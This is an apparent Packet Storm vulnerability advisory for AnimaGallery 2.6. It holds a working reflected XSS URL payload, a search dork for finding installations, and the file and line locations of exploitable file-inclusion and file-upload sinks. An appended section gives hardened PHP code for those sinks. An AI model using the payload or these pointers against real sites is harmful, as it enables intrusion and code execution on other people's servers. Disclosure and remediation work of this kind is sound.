AnimaGallery 2.6 LFI / XSS / File Upload

2015-06-04T00:00:00
ID PACKETSTORM:132150
Type packetstorm
Reporter indoushka
Modified 2015-06-04T00:00:00

Description

                                        
`AnimaGallery 2.6 Multiple Vulnerabilities  
=====================================  
Author : indoushka  
Vendor : http://dg.no.sapo.pt/AnimaGallery2.6.zip  
Dork : Powered By Anima Gallery 2.6 Copyright 2007-2014   
=========================  
  
XSS :  
  
/AnimaGallery/?id=.</title><ScRiPt%20>prompt(939678)</ScRiPt>&load=dir&refresh=1  
  
C:\AppServ\www\AnimaGallery\func.php  
Line : 1308  
echo  
$THEME  
  
Remote/Local File Inclusion :  
  
C:\AppServ\www\AnimaGallery\func.php  
Line : 1118  
include  
$_GET['id']  
  
File Access :  
  
C:\AppServ\www\AnimaGallery\func.php  
Line : 6133  
file_get_contents  
$filename  
  
File Upload :  
  
C:\AppServ\www\AnimaGallery\func.php  
  
Line : 3405  
move_uploaded_file  
$_FILES['newimage'],$dest,$_POST['rename'],$sfv_n,$dest  
`
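
Added example, not part of the advisory and not AnimaGallery code: hardened PHP forms of the four sink types the advisory lists in func.php (echo, include, file_get_contents, move_uploaded_file). The function names, the `views/dir.php` path and the sample inputs are hypothetical.

```php
<?php
// Added illustration; helper names are hypothetical, not AnimaGallery code.

// echo sink: encode request-derived values for the HTML context.
function h(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// include sink fed by $_GET['id']: the request only selects a key from a
// fixed allowlist and never supplies a path or URL itself.
function resolve_page(string $id, array $allowed): ?string {
    return $allowed[$id] ?? null;
}

// file_get_contents sink: the resolved path must stay under one base directory.
function safe_path(string $baseDir, string $name): ?string {
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

// move_uploaded_file sink: ignore client-chosen names such as $_POST['rename'],
// detect the type from the file bytes, and generate the stored name server-side.
function store_image(array $file, string $destDir): ?string {
    $types = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($types[$mime])) {
        return null;
    }
    $target = rtrim($destDir, '/\\') . DIRECTORY_SEPARATOR
            . bin2hex(random_bytes(16)) . '.' . $types[$mime];
    return move_uploaded_file($file['tmp_name'], $target) ? $target : null;
}

// Constructed inputs for a quick CLI check (paths and ids are placeholders).
$pages = ['dir' => __DIR__ . '/views/dir.php'];
var_dump(resolve_page('dir', $pages));
var_dump(resolve_page('../config', $pages));
var_dump(safe_path(__DIR__, '../outside.txt'));
echo h('</title><b>id</b>'), PHP_EOL;
```

Storing uploads outside the web root, or in a directory where the server does not execute PHP, complements the type check in `store_image`.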